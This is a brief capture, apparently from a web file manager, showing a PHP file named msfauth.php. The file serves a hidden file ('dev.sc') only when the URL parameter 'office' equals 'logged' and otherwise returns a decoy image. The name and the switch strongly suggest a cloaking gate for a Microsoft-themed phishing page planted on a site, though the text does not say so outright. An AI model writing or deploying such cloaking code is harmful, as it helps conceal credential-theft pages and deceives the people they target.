EVOLUTION-MANAGER
Edit File: msfauth.php
<?php $id = $_GET["office"]; if ($id == "logged") { $myFile = "dev.sc"; $fh = fopen($myFile, 'r'); $theData = fread($fh, 500000); fclose($fh); echo $theData; } else{ $myFile1 = "bj.jpg"; $fh1 = fopen($myFile1, 'r'); $theData1 = fread($fh1, 500000); fclose($fh1); echo $theData1; } ?>